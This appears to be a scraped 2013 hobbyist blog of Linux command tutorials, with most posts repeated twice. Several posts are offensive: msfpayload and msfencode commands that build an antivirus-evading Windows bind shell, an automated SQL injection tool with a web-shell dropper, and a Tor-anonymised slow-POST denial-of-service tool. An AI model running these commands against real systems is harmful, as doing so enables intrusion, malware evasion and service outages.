Netstat (network statistics) is a command-line tool that displays network connections, routing tables, and a number of network interface, and network protocol statistics.
Netstat is available on Unix-like operating systems (linux, osx, bsd and others) and on Windows.
With options -i we can see the interface (eth0, wlan0, tun0 and so on) table : netstat -i
Instead with -r we can see the route table : netstat -r
With -s we can see the networking statistics : netstat -s:
ex :
Ip:
278821 total packets received
6 with invalid addresses
0 forwarded
0 incoming packets discarded
278815 incoming packets delivered
260870 requests sent out
248 outgoing packets dropped
2250 dropped because of missing route
You can also see Icmp, UDP, TCP ecc..
--numeric : don't resolve names
--numeric-hosts : don't resolve host names
--numeric-ports : don't resolve port names
--numeric-users : don't resolve user names
With -p we can display display PID/Program name for sockets : netstat -p
-l : see listening server socket : netstat -l
ex :
unix 2 [ ACC ] STREAM LISTENING 7053 @/tmp/dbus-xW2uFsRBZo
Instead -a to see all server socket.
For more informations type netstat -h
If you have any problem or you need some explanations just write under this post!
Saturday, May 11, 2013
portscan-python
Python portscan allows you to scan specify ports in an IP. For run portscan.py you must have python 2.x (x>4).
Check it out from here
Source code : http://pastebin.com/2iwkxxbc
Check it out from here
Source code : http://pastebin.com/2iwkxxbc
Monday, May 6, 2013
Fdisk
Fdisk is use to manipulate disk partition table
There is also a simply GUI of fidisk, cfdisk.
For run fdisk (or cfdisk) you need root user.
The device is usually /dev/sda, /dev/sdb, dev/sdc and so on for SCSI device instead for IDE device is usually /dev/hda, /dev/hdb and so on.
You can see your device on /dev (ls /dev).
Type - sudo fdisk /dev/sda - for use sda partition.
Now if you type p you can see your partition table.
If you type v you can verify the partition table, for example:
Remaining 62 unallocated 512-byte sectors
With d you can delete a parition instead with n you can create new partition.
If you create new partition you can choice if create primary partition of extended (max 4 primary partition!):
Partition type:
p primary (3 primary, 0 extended, 1 free)
e extended
For a complete list of command action type m.
You can specify some options when you run fdisk:
-b sectorsize: Specify the sector size of the disk. Valid values are 512, 1024, 2048 or 4096.
-c=mode: Specify the compatibility mode, 'dos' or 'nondos' (default c=nondos)
-l : List the partition tables for the specified devices and then exit.
-s partition: Print the size (in blocks) of each given partition.
ex : sudo fdisk -s /dev/sda1
9767488
sudo fdisk -s /dev/sda
156290904
If you have any problem or you need some explanations just write under this post!
There is also a simply GUI of fidisk, cfdisk.
For run fdisk (or cfdisk) you need root user.
The device is usually /dev/sda, /dev/sdb, dev/sdc and so on for SCSI device instead for IDE device is usually /dev/hda, /dev/hdb and so on.
You can see your device on /dev (ls /dev).
Type - sudo fdisk /dev/sda - for use sda partition.
Now if you type p you can see your partition table.
If you type v you can verify the partition table, for example:
Remaining 62 unallocated 512-byte sectors
With d you can delete a parition instead with n you can create new partition.
If you create new partition you can choice if create primary partition of extended (max 4 primary partition!):
Partition type:
p primary (3 primary, 0 extended, 1 free)
e extended
For a complete list of command action type m.
You can specify some options when you run fdisk:
-b sectorsize: Specify the sector size of the disk. Valid values are 512, 1024, 2048 or 4096.
-c=mode: Specify the compatibility mode, 'dos' or 'nondos' (default c=nondos)
-l : List the partition tables for the specified devices and then exit.
-s partition: Print the size (in blocks) of each given partition.
ex : sudo fdisk -s /dev/sda1
9767488
sudo fdisk -s /dev/sda
156290904
If you have any problem or you need some explanations just write under this post!
Saturday, May 4, 2013
Friday, May 3, 2013
Tracepath
tracepath is a tool used to traces path to a network host discovering MTU along this path.
The maximum transmission unit (MTU) is the size of the largest protocol data unit that the layer can pass onwards.
tracepath6 is used for IPv6, it is a replacement of traceroute6
Example : tracepath 127.0.0.1
1: localhost.localdomain 0.528ms reached
Resume: pmtu 65535 hops 1 back 64
You can see the TTL (time to live, is a mechanism that limits the lifespan or lifetime of data in a computer or network.)
With tracepath you can specify some options:
-n : Print primarily IP addresses numerically.
-b : Print both of host names and IP addresses.
-l : Sets the initial packet length (instead 65536 for tracepath and 128000 for tracepath6)
If you have any problem or you need some explanations just write under this post!
The maximum transmission unit (MTU) is the size of the largest protocol data unit that the layer can pass onwards.
tracepath6 is used for IPv6, it is a replacement of traceroute6
Example : tracepath 127.0.0.1
1: localhost.localdomain 0.528ms reached
Resume: pmtu 65535 hops 1 back 64
You can see the TTL (time to live, is a mechanism that limits the lifespan or lifetime of data in a computer or network.)
With tracepath you can specify some options:
-n : Print primarily IP addresses numerically.
-b : Print both of host names and IP addresses.
-l : Sets the initial packet length (instead 65536 for tracepath and 128000 for tracepath6)
If you have any problem or you need some explanations just write under this post!
Wednesday, May 1, 2013
msfencode
msfencode is used to encode our payload for bypass antivirus.
With -e we can specify the type of encoding, to see the list of avaible encoders type msfencode -l
With -l we can see the name of encoders, the rank and descripio for example:
Name: x86/shikata_ga_nai
Rank : Excellent
Description : Polymorphic XOR Additive Feedback Encoder
With -c we can specify how many times use the econder.
Now we must specify the type of payload for example pl,rb,java,c,exe and so on (for a complete list type msfencode -h).
How can we use msfencode with msfpayload?
Example: msfpayload windows/shell/bind_tcp LPORT=3333 RHOST=ip X | msfencode -e x86/shikata_ga_nai -c 20 -t exe -o /home/HackForLulz/payload.exe
With msfpayload we create a windows/shell/bind_tcp and we encode it with msfencode:
Encoder : x86/shikata_ga_nai
Numbers of encodings : 20
Type : exe
output : /home/HackForLulz/payload.exe
If you have any problems or you need some explanations just write under this post!
With -e we can specify the type of encoding, to see the list of avaible encoders type msfencode -l
With -l we can see the name of encoders, the rank and descripio for example:
Name: x86/shikata_ga_nai
Rank : Excellent
Description : Polymorphic XOR Additive Feedback Encoder
With -c we can specify how many times use the econder.
Now we must specify the type of payload for example pl,rb,java,c,exe and so on (for a complete list type msfencode -h).
How can we use msfencode with msfpayload?
Example: msfpayload windows/shell/bind_tcp LPORT=3333 RHOST=ip X | msfencode -e x86/shikata_ga_nai -c 20 -t exe -o /home/HackForLulz/payload.exe
With msfpayload we create a windows/shell/bind_tcp and we encode it with msfencode:
Encoder : x86/shikata_ga_nai
Numbers of encodings : 20
Type : exe
output : /home/HackForLulz/payload.exe
If you have any problems or you need some explanations just write under this post!
Sunday, April 28, 2013
Friday, April 26, 2013
SSH Server
You can start ssh server starting deamon sshd.
For example in archlinux you can start deamon using rc.d (sudo rc.d start sshd).
sshd config file si /etc/ssh/sshd_config.
You can edit it with your favourite editor for example: sudo nano /etc/ssh/sshd_config
First of all you can specify the protocol (Protocol 2 reccomended).
You can change default port, for example : PORT 3333
You can also change listen address ListenAddress 0.0.0.0
PasswordAuthentication no -> disable password (yes to enable).
AllowUsers user1, user2 ..
For example : AllowUser root, hackforlulz
If you have any problem or if you need some explanations just write under this post!
For example in archlinux you can start deamon using rc.d (sudo rc.d start sshd).
sshd config file si /etc/ssh/sshd_config.
You can edit it with your favourite editor for example: sudo nano /etc/ssh/sshd_config
First of all you can specify the protocol (Protocol 2 reccomended).
You can change default port, for example : PORT 3333
You can also change listen address ListenAddress 0.0.0.0
PasswordAuthentication no -> disable password (yes to enable).
AllowUsers user1, user2 ..
For example : AllowUser root, hackforlulz
If you have any problem or if you need some explanations just write under this post!
Thursday, April 25, 2013
Tuesday, April 23, 2013
Namebench
namebench is a python script that give you the fastest DNS servers available for you.
namebench runs a fair and thorough benchmark using your web browser history, tcpdump output, or standardized datasets.
nambench has a Tk interface, for start namebench type ./namebench.py
Now you can :
-include global dns providers like OpenDNS, Google public DNS ecc..
-include best avaiable regional DNS services
-include censorship check
You can also help speed up internet uploading your anonymized results.
After specify healt check performance and numbers of query you can start.
When nambench end save a result and give you the fastest dns !!!
You can also use command line:
Type -x for disable GUI
-C : enable censorship check
-q : specify numbers of query
-u : upload result
If you have any problem or you need some explanations just write under this post!
namebench runs a fair and thorough benchmark using your web browser history, tcpdump output, or standardized datasets.
nambench has a Tk interface, for start namebench type ./namebench.py
Now you can :
-include global dns providers like OpenDNS, Google public DNS ecc..
-include best avaiable regional DNS services
-include censorship check
You can also help speed up internet uploading your anonymized results.
After specify healt check performance and numbers of query you can start.
When nambench end save a result and give you the fastest dns !!!
You can also use command line:
Type -x for disable GUI
-C : enable censorship check
-q : specify numbers of query
-u : upload result
If you have any problem or you need some explanations just write under this post!
Monday, April 22, 2013
Speedtest-cli
speedtest-cli is python tool for testing internet bandwidth using speedtest.net
If you have a version of python between 2.4 and 2.7 you can download speedtest-cli from here.
Else if you have a versione of python 3.x you can download speedtest-cli-3 from here.
First of all type : ./speedtest-cli.py --list -> for show all server list sorted by distance.
Now you can specify server with options:
--server server
You can specify --simple for show only basic informations
If you want share result image using --share
./speedtest-cli.py --list
You have a result like:
1527) Dianet (Aleysk, Russian Federation) [4954.41 km]
2730) DOM.RU (Barnaul, Russian Federation) [4956.74 km]
1550) Dianet (Barnaul, Russian Federation) [4959.08 km] 1833) JSC Zap-Sib TransTeleCom (Barnaul, Russian Federation) [4959.08 km]
For example if you want use this server Dianet (Aleysk, Russian Federation) [4954.41 km] type:
./speedtest-cli.py --server 1527
If you have any problem or if you need some explanations just write under this post!
If you have a version of python between 2.4 and 2.7 you can download speedtest-cli from here.
Else if you have a versione of python 3.x you can download speedtest-cli-3 from here.
First of all type : ./speedtest-cli.py --list -> for show all server list sorted by distance.
Now you can specify server with options:
--server server
You can specify --simple for show only basic informations
If you want share result image using --share
./speedtest-cli.py --list
You have a result like:
1527) Dianet (Aleysk, Russian Federation) [4954.41 km]
2730) DOM.RU (Barnaul, Russian Federation) [4956.74 km]
1550) Dianet (Barnaul, Russian Federation) [4959.08 km] 1833) JSC Zap-Sib TransTeleCom (Barnaul, Russian Federation) [4959.08 km]
For example if you want use this server Dianet (Aleysk, Russian Federation) [4954.41 km] type:
./speedtest-cli.py --server 1527
If you have any problem or if you need some explanations just write under this post!
Sunday, April 21, 2013
Vi - editor
Vi is a display oriented text editor based on ex.
We can start vi with following syntax :
vi [-c command] [-r filename] [-w size] [file 1] [file 2] [file n]
With -c command we can execute command when vi start.
-r filename is specified for recover the modify that we didn't save (for example if system crash).
-w size : specify the size of the editing window for visual mode.
We can open a file in read-only mode using -R option.
We can specify more than one file. Vi open all file and display the first specified file. We can go to following file with command :n
Vi has three mode:
-COMMAND MODE : we can only specify the commands.
-INPUT MODE
-DIRECTIVE MODE : in this mode we can asd to vi all commands.
When we launch vi we are in COMMAND MODE. We can switch from COMMAND MODE to INPUT MODE typing : o -> insert characters under current line
O -> insert characters above current line
R -> replace mode
i -> insert characters to the left of cursor
I -> insert characters at the start of line
a -> insert characters to the right of cursor
A -> insert characters at the end of line
Instead we can switch from INPUT MODE to COMMAND MODE with
We can switch from COMMAND MODE to DETECTIVE MODE typing :
?
/
:
Instead we can switch from DETECTIVE MODE to COMMAND MODE with
Moving :
h -> left
j -> under
k -> above
l -> right
G -> move to last line
nG -> move to n line (ex : 2 G -> move to line 2)
What is a word for vi?
A word is any sequence of characters.
What is a phrase for vi?
A phrase is any sequence of characters that end with ".", "!","?", double space.
What is a paragraph for vi?
A paragrapth is delimited by blank line.
{ -> Move cursor to the start of paragraph
} -> Move the cursor to the end of paragraph
( -> Move the cursor to the start of current phrase
) -> Move the cursor to the end of current phrase
$ -> Move the cursor to the end of line
^ -> Move the cursor to the first non-blank character of current line
0 -> Move the cursor to the start of current line
n| -> Move the cursor to n character of current line (ex : 3| -> move to third character of current line)
w -> Move the cursor to the start of next word
e -> Move the cursor to the end of next word
b -> Move the cursor to the start of last word
+ -> Move the cursor to the first non-blank character of next line
- -> Move the cursor to the first non-blank character of last line
EDIT
^D -> Remove single tab
^^D -> Remove all tab
^W -> Delete last word we insert
^U -> Delete last line we insert
^H -> Backspace
ZZ -> Update file and exit
:q[!] -> Force quit
:wq -> Update and exit
u -> undo the last modify
U -> undo all modify done to current line
ndd -> Delete n lines (default current line)
d/str -> Delete while find str (going forward)
d?str -> Delete while find str (going back)
D -> Delete from current position to end of current line
P -> paste buffer before the cursor
p -> paste buffer after cursor
f char -> find the next occurrence of char
F char -> find the occurence of char before the current position
t char -> move the cursor to the next occurrence of char
T char -> move the cursor to the occurrence of char before current position
We can repeat the last command typing n
Double ">" -> orizontal tab
Double "<" -> remove orizontal tab
Commands in directive mode
With this commands we can control the files.
:args -> show files that we're editing (we can open more than one file!)
:n -> edit next file
:n filename -> edit filename
If we specified [!] we force the commands so vi don't update file.
:rew -> restart to edit first file (we can specify [!])
:st[op] -> Vi goes in backgroud and we return to shell. If we want return in vi type fg vi
For more information see the manual of vi (man vi)
If you have any problem or you need some explanation just write under this post!
We can start vi with following syntax :
vi [-c command] [-r filename] [-w size] [file 1] [file 2] [file n]
With -c command we can execute command when vi start.
-r filename is specified for recover the modify that we didn't save (for example if system crash).
-w size : specify the size of the editing window for visual mode.
We can open a file in read-only mode using -R option.
We can specify more than one file. Vi open all file and display the first specified file. We can go to following file with command :n
Vi has three mode:
-COMMAND MODE : we can only specify the commands.
-INPUT MODE
-DIRECTIVE MODE : in this mode we can asd to vi all commands.
When we launch vi we are in COMMAND MODE. We can switch from COMMAND MODE to INPUT MODE typing : o -> insert characters under current line
O -> insert characters above current line
R -> replace mode
i -> insert characters to the left of cursor
I -> insert characters at the start of line
a -> insert characters to the right of cursor
A -> insert characters at the end of line
Instead we can switch from INPUT MODE to COMMAND MODE with
We can switch from COMMAND MODE to DETECTIVE MODE typing :
?
/
:
Instead we can switch from DETECTIVE MODE to COMMAND MODE with
Moving :
h -> left
j -> under
k -> above
l -> right
G -> move to last line
nG -> move to n line (ex : 2 G -> move to line 2)
What is a word for vi?
A word is any sequence of characters.
What is a phrase for vi?
A phrase is any sequence of characters that end with ".", "!","?", double space.
What is a paragraph for vi?
A paragrapth is delimited by blank line.
{ -> Move cursor to the start of paragraph
} -> Move the cursor to the end of paragraph
( -> Move the cursor to the start of current phrase
) -> Move the cursor to the end of current phrase
$ -> Move the cursor to the end of line
^ -> Move the cursor to the first non-blank character of current line
0 -> Move the cursor to the start of current line
n| -> Move the cursor to n character of current line (ex : 3| -> move to third character of current line)
w -> Move the cursor to the start of next word
e -> Move the cursor to the end of next word
b -> Move the cursor to the start of last word
+ -> Move the cursor to the first non-blank character of next line
- -> Move the cursor to the first non-blank character of last line
EDIT
^D -> Remove single tab
^^D -> Remove all tab
^W -> Delete last word we insert
^U -> Delete last line we insert
^H -> Backspace
ZZ -> Update file and exit
:q[!] -> Force quit
:wq -> Update and exit
u -> undo the last modify
U -> undo all modify done to current line
ndd -> Delete n lines (default current line)
d/str -> Delete while find str (going forward)
d?str -> Delete while find str (going back)
D -> Delete from current position to end of current line
P -> paste buffer before the cursor
p -> paste buffer after cursor
f char -> find the next occurrence of char
F char -> find the occurence of char before the current position
t char -> move the cursor to the next occurrence of char
T char -> move the cursor to the occurrence of char before current position
We can repeat the last command typing n
Double ">" -> orizontal tab
Double "<" -> remove orizontal tab
Commands in directive mode
With this commands we can control the files.
:args -> show files that we're editing (we can open more than one file!)
:n -> edit next file
:n filename -> edit filename
If we specified [!] we force the commands so vi don't update file.
:rew -> restart to edit first file (we can specify [!])
:st[op] -> Vi goes in backgroud and we return to shell. If we want return in vi type fg vi
For more information see the manual of vi (man vi)
If you have any problem or you need some explanation just write under this post!
Saturday, April 20, 2013
SSH - Secure shell
SSH is a program for logging into a remote machine and for executing commands on a remote machine.
SSH provide secure encrypted communications between two untrusted hosts over an insecure network.
We can use four "type" of connection:
-1 -> try only protocol version 1
-2 -> try only protocol version 2 (RECCOMENDED)
-4 -> try only IPv4
-6 -> try only IPv6
Default protocol is 2 because provide additional mechanisms for confidentiality and integrity.
Syntax : ssh [options] [user@]hostname [command]
To connect you must specified hostname with user(optional).
If command is specified, it is executed on the remote host instead of a login shell.
With options -A you can enable authentication agent connection, instead with option -a you can disable authentication agent connection.
If you use more than one address you can specified the address of the connection with option -b
-b address
You can also compress all data with options -C. The compression algorithm is the same used for gzip.
For encrypting the session we can use -c chiper
For more informations about encrypting see config file (ssh_config)
-f : Requests ssh to go to background just before command execution.
To specify the user to log in use options -l login_name
With option -n you can redirect stdin into /dev/null
The default port for ssh is 22. You can specify the port with options -p port
You can also enable (-X) or disable (-x) the x11 forwarding.
For more informations about ssh you can see the manual of ssh (type man ssh).
If you have a problem or you need some explanations just write under this post!
SSH provide secure encrypted communications between two untrusted hosts over an insecure network.
We can use four "type" of connection:
-1 -> try only protocol version 1
-2 -> try only protocol version 2 (RECCOMENDED)
-4 -> try only IPv4
-6 -> try only IPv6
Default protocol is 2 because provide additional mechanisms for confidentiality and integrity.
Syntax : ssh [options] [user@]hostname [command]
To connect you must specified hostname with user(optional).
If command is specified, it is executed on the remote host instead of a login shell.
With options -A you can enable authentication agent connection, instead with option -a you can disable authentication agent connection.
If you use more than one address you can specified the address of the connection with option -b
-b address
You can also compress all data with options -C. The compression algorithm is the same used for gzip.
For encrypting the session we can use -c chiper
For more informations about encrypting see config file (ssh_config)
-f : Requests ssh to go to background just before command execution.
To specify the user to log in use options -l login_name
With option -n you can redirect stdin into /dev/null
The default port for ssh is 22. You can specify the port with options -p port
You can also enable (-X) or disable (-x) the x11 forwarding.
For more informations about ssh you can see the manual of ssh (type man ssh).
If you have a problem or you need some explanations just write under this post!
msfpayload
msfpayload is a command-line instance of Metasploit that is used to generate and output all payload that are available in Metasploit.
To usage msfpayload type : msfpayload -h
Syntax : /opt/metasploit/msfpayload [options] payload [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>
So /opt/metasploit/msfpayload is the path (can change, depending of os)
Maybe could be /opt/metasploit/msf3/msfpayload
You must specify payload with full path.
You can know the full path of all avaiable payload type : msfpayload -l
For example : windows/shell/bind_tcp
Now you must know the options about your payload, so type : msfpayload fullpath O
Example : msfpayload windows/shell/bind_tcp O
EXITFUNC process yes Exit technique: seh, thread, process, none
LPORT 4444 yes The listen port
LHOST no The listen address
Now we must create our payload specifying the payload's options
Example :
msfpayload windows/shell/bind_tcp LPORT=3333 RHOST=ip X > /home/HackForLulz/payload.exe
X = specify the type of payload : E(X)E , (P)ERL, RUB(y) and so on...
> /home/HackForLulz/payload.exe = specify where create our payload
If you have a problem or you need some explanations just write under this post!
To usage msfpayload type : msfpayload -h
Syntax : /opt/metasploit/msfpayload [options] payload [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>
So /opt/metasploit/msfpayload is the path (can change, depending of os)
Maybe could be /opt/metasploit/msf3/msfpayload
You must specify payload with full path.
You can know the full path of all avaiable payload type : msfpayload -l
For example : windows/shell/bind_tcp
Now you must know the options about your payload, so type : msfpayload fullpath O
Example : msfpayload windows/shell/bind_tcp O
EXITFUNC process yes Exit technique: seh, thread, process, none
LPORT 4444 yes The listen port
LHOST no The listen address
Now we must create our payload specifying the payload's options
Example :
msfpayload windows/shell/bind_tcp LPORT=3333 RHOST=ip X > /home/HackForLulz/payload.exe
X = specify the type of payload : E(X)E , (P)ERL, RUB(y) and so on...
> /home/HackForLulz/payload.exe = specify where create our payload
If you have a problem or you need some explanations just write under this post!
Wednesday, April 17, 2013
Monday, April 15, 2013
Iptables
Iptables is a firewall built into linux kernel.
Iptables is used for IPv4 and ip6tables is used for IPv6.
Iptables contain four tabels : raw, filter, nat and mangle.
There are three built in chains :
-Chain input
-Chain output
-Chain forward
We can set the target of packet using the options -j (jump).
The most used target are : ACCEPT, REJECT, DROP, LOG.
sudo iptables -L -> check the current rules of iptables.
For more informations about current rules type : sudo iptables -L -v
-v -> verbose mode
With syntax " iptables -P chain target [options] " we can chenge the rules.
For example : sudo iptables -P INPUT DROP
We drop all input packet.
After drop all input we can modify options ensuring traffic request by us:
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A -> -A Chain : Append to chain
-m state-> extended match (state in this case)
-j -> jump options
We can also specify a interface for example lopback
sudo iptables -A INPUT -i lo -j ACCEPT
-i -> specify interface
We can also ensure a traffic by specific port:
sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT
I reccomend you to don't modify OUTPUT chain because linux doesn't work like windows that send in output our datas.
Now if you type : sudo iptables -L -v you can see the modify ;)
If you have a problem or you need some explanations just write under this post!
Iptables is used for IPv4 and ip6tables is used for IPv6.
Iptables contain four tabels : raw, filter, nat and mangle.
There are three built in chains :
-Chain input
-Chain output
-Chain forward
We can set the target of packet using the options -j (jump).
The most used target are : ACCEPT, REJECT, DROP, LOG.
sudo iptables -L -> check the current rules of iptables.
For more informations about current rules type : sudo iptables -L -v
-v -> verbose mode
With syntax " iptables -P chain target [options] " we can chenge the rules.
For example : sudo iptables -P INPUT DROP
We drop all input packet.
After drop all input we can modify options ensuring traffic request by us:
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A -> -A Chain : Append to chain
-m state-> extended match (state in this case)
-j -> jump options
We can also specify a interface for example lopback
sudo iptables -A INPUT -i lo -j ACCEPT
-i -> specify interface
We can also ensure a traffic by specific port:
sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT
I reccomend you to don't modify OUTPUT chain because linux doesn't work like windows that send in output our datas.
Now if you type : sudo iptables -L -v you can see the modify ;)
If you have a problem or you need some explanations just write under this post!
Sunday, April 14, 2013
Guide Tkinter Python [ITA]
Friday, April 12, 2013
Irssi - IRC client
Irssi is an IRC client program for Linux, FreeBSD, Microsoft Windows, and Mac OS X.
Irssi is written in the C programming language and in normal operation uses a text-mode user interface.
You can find irssi here
After installation run irssi and type /set for a complete list of options.
For go up and down on screen type CTRL+P (up) CTRL+N (down).
To set a options type : /set option=value
In config file of irssi you can set a server where join.
example:
servers = (
{
address = "irc.autistici.org";
chatnet = "AI";
port = "6667";
use_ssl = "no";
password = "password";
}
);
Now type on irssi : /connect AI -> automatically irssi connect to irc.autistici.org/6667
To change channel type : CTRL+P (next) CTRL+N (back)
If you have a problem or you need some explanations just write under this post!
Irssi is written in the C programming language and in normal operation uses a text-mode user interface.
You can find irssi here
After installation run irssi and type /set for a complete list of options.
For go up and down on screen type CTRL+P (up) CTRL+N (down).
To set a options type : /set option=value
In config file of irssi you can set a server where join.
example:
servers = (
{
address = "irc.autistici.org";
chatnet = "AI";
port = "6667";
use_ssl = "no";
password = "password";
}
);
Now type on irssi : /connect AI -> automatically irssi connect to irc.autistici.org/6667
To change channel type : CTRL+P (next) CTRL+N (back)
If you have a problem or you need some explanations just write under this post!
Friday, April 5, 2013
Xte - Keypress simulation
Xte generates fake input using the XTest extension.
The packets is xautomation.
-x display : Send commands to remote X server.
Commands :
key k : press and release
keydown k : press key
keyup k : release key
str string : write string
mouseclick i : press and release i button
mousedown i : press i button
mouseup i : release i button
mousemove x y : move mouse to x y
sleep x : sleep x seconds
Examples :
xte 'key RETURN' <- press and release Enter
xte 'keydown TAB' <- press TAB
xte 'keyup BACKSPACE' <- press Backspace
xte 'str hackforlulz' <- write hackforlulz
xte 'mouseclick 1' <- click with left button
xte 'mousedown 3' <- press with right button
List of useful commands :
Up, Down, Right, Left, Page_up, Page_down, Tab, Delete, Return, Backspace, End, Alt_L, Alt_R, Shift_L, Shift_R
If you have a problem or you need some explanations just write under this post!
The packets is xautomation.
-x display : Send commands to remote X server.
Commands :
key k : press and release
keydown k : press key
keyup k : release key
str string : write string
mouseclick i : press and release i button
mousedown i : press i button
mouseup i : release i button
mousemove x y : move mouse to x y
sleep x : sleep x seconds
Examples :
xte 'key RETURN' <- press and release Enter
xte 'keydown TAB' <- press TAB
xte 'keyup BACKSPACE' <- press Backspace
xte 'str hackforlulz' <- write hackforlulz
xte 'mouseclick 1' <- click with left button
xte 'mousedown 3' <- press with right button
List of useful commands :
Up, Down, Right, Left, Page_up, Page_down, Tab, Delete, Return, Backspace, End, Alt_L, Alt_R, Shift_L, Shift_R
If you have a problem or you need some explanations just write under this post!
Wednesday, April 3, 2013
Sqlcake - Automatic Sqli
Automatic dump database & interactive sql shell tool dumps the current database structure including tables and columns and turns into an interactive mysql prompt with extra features.
Sqlcake is written in ruby, you can find ruby here
You can download sqlcake from here
Sytax : ruby sqlcake.rb -u target -p target parameter [options] [special commands]
Options :
-u : target URI (ex : www.site.com/home/php?val=5)
-p : target parameter (ex : val)
-e : error string for union selection
-d : error escape string
-b : use blind sql injection mode
-f file : write data to output file
-x : skip database dump
Special commands :
hex:[str] : hex a string for magic quotes bypassing
dropshell:[str] : drops a php shell
dump:[str] : to dump a specific table
blind:[on/off] : toggle blind sql injection mode
Example :
ruby sqlcake.rb -u www.site.com/home/php?val=5&id=3 -p id
Target = www.site.com/home/php?val=5&id=3
Param = id
ruby sqlcake.rb -u www.site.com/home/php?val=5&id=3 -p val -b
Target = www.site.com/home/php?val=5&id=3
Param = val
Bind = Yes
For more informations about sqlcake type : ruby sqlcake.rb
If you have a problem or you need some explanations just write under this post!
Sqlcake is written in ruby, you can find ruby here
You can download sqlcake from here
Sytax : ruby sqlcake.rb -u target -p target parameter [options] [special commands]
Options :
-u : target URI (ex : www.site.com/home/php?val=5)
-p : target parameter (ex : val)
-e : error string for union selection
-d : error escape string
-b : use blind sql injection mode
-f file : write data to output file
-x : skip database dump
Special commands :
hex:[str] : hex a string for magic quotes bypassing
dropshell:[str] : drops a php shell
dump:[str] : to dump a specific table
blind:[on/off] : toggle blind sql injection mode
Example :
ruby sqlcake.rb -u www.site.com/home/php?val=5&id=3 -p id
Target = www.site.com/home/php?val=5&id=3
Param = id
ruby sqlcake.rb -u www.site.com/home/php?val=5&id=3 -p val -b
Target = www.site.com/home/php?val=5&id=3
Param = val
Bind = Yes
For more informations about sqlcake type : ruby sqlcake.rb
If you have a problem or you need some explanations just write under this post!
Tuesday, April 2, 2013
Tor's Hammer
Tor's Hammer is a slow post dos testing tool written in Python. It can also be run through the Tor network to be anonymized.
If you are going to run it with Tor it assumes you are running Tor on 127.0.0.1:9050.
You can download Tor's Hammer from here.
Syntax : ./torshammer.py -t target [options]
Options:
-t : IP or Hostname
-r : numbers of thread (default = 256)
-p : web server port (default = 80)
-T : Enable anonymising through tor on 127.0.0.1:9050
Ex : ./torshammer.py -t www.site.com -p 80 -T -r 128
Host = www.site.com
port = 80
Enable anonymoys trought tor
Numbers of thread = 128
If you have a problem or you need some explanations just write under this post!
If you are going to run it with Tor it assumes you are running Tor on 127.0.0.1:9050.
You can download Tor's Hammer from here.
Syntax : ./torshammer.py -t target [options]
Options:
-t : IP or Hostname
-r : numbers of thread (default = 256)
-p : web server port (default = 80)
-T : Enable anonymising through tor on 127.0.0.1:9050
Ex : ./torshammer.py -t www.site.com -p 80 -T -r 128
Host = www.site.com
port = 80
Enable anonymoys trought tor
Numbers of thread = 128
If you have a problem or you need some explanations just write under this post!
Saturday, March 30, 2013
GCC - Gnu Compiler Collection
GCC is a compiler system produced by the GNU Project supporting various programming languages.
GCC support C, C++, Fortran, Java, Ada and others.
Syntax : gcc [options] file
Options :
-v : Display the programs invoked by the compiler
-E : Preprocess only; do not compile, assemble or link
-S : Compile only; do not assemble or link
-c : Compile and assemble, but do not link
-o file : Place the output into file
-pie : Create a position independent executable
-shared : Create a shared library
Ex : gcc plot.c -o plot
./plot <- run
For more informations type : gcc --help or gcc --target-help
If you have a problem or you need some explanations just write under this post!
GCC support C, C++, Fortran, Java, Ada and others.
Syntax : gcc [options] file
Options :
-v : Display the programs invoked by the compiler
-E : Preprocess only; do not compile, assemble or link
-S : Compile only; do not assemble or link
-c : Compile and assemble, but do not link
-o file : Place the output into file
-pie : Create a position independent executable
-shared : Create a shared library
Ex : gcc plot.c -o plot
./plot <- run
For more informations type : gcc --help or gcc --target-help
If you have a problem or you need some explanations just write under this post!
Friday, March 29, 2013
Ps - process control
Ps return a snapshot of the current processes.
Pay attention 'cause ps -a is distinct from ps a
This version of ps accepts several kinds of options:
-UNIX options, which may be grouped and must be preceded by a dash.
-BSD options, which may be grouped and must not be used with a dash.
-GNU long options, which are preceded by two dashes.
Syntax : ps [options]
Options :
-A : Select all processes
-a : Select all processes except both session leaders and processes not associated with a terminal
-d : Select all processes except session leaders
g : Really all, even session leaders
-N : Select all processes except those that fulfill the specified conditions
T : Select all processes associated with this terminal
r : Restrict the selection to only running processes
-C cmdlist : Select by command name
-G grouplist : Select by real group ID or name
-g grouplist : Select by session OR by effective group name
-p pidlist : Select by process ID
--ppid pidlist : Select by parent process ID
-s sessionlist : Select by session ID
-t ttylist : Select by tty
-U userlist : Select by real user ID or name
-u userlist : Select by effective user ID or name
-c : Show different scheduler information for the -l option
-f : Do full-format listing
-F : Extra full format
-j : Jobs format
-l : Long format
-M : Add a column of security data
s : Display signal format
u : Display user-oriented format
v : Display virtual memory format
X : Register format
--columns n : Set screen width
--lines n : Set screen height
--cumulative : Include some dead child process data
e : Show the environment after the command
f : ASCII art process hierarchy
h : No header
-H : Show process hierarchy
--headers : Repeat header lines
-n namelist : Set namelist file
Examples :
ps -e : see every process
ps -ef : see every processes with full format listing
ps -U hackforlulz : see every processes running as hackforlulz user (real)
ps -p 666 : see process with pid = 666
ps -p 666 -H : see process with pid = 666 and the hierarchy
For more informations about ps type : man ps
If you have a problem or you need some explanations just write under this post!
Pay attention 'cause ps -a is distinct from ps a
This version of ps accepts several kinds of options:
-UNIX options, which may be grouped and must be preceded by a dash.
-BSD options, which may be grouped and must not be used with a dash.
-GNU long options, which are preceded by two dashes.
Syntax : ps [options]
Options :
-A : Select all processes
-a : Select all processes except both session leaders and processes not associated with a terminal
-d : Select all processes except session leaders
g : Really all, even session leaders
-N : Select all processes except those that fulfill the specified conditions
T : Select all processes associated with this terminal
r : Restrict the selection to only running processes
-C cmdlist : Select by command name
-G grouplist : Select by real group ID or name
-g grouplist : Select by session OR by effective group name
-p pidlist : Select by process ID
--ppid pidlist : Select by parent process ID
-s sessionlist : Select by session ID
-t ttylist : Select by tty
-U userlist : Select by real user ID or name
-u userlist : Select by effective user ID or name
-c : Show different scheduler information for the -l option
-f : Do full-format listing
-F : Extra full format
-j : Jobs format
-l : Long format
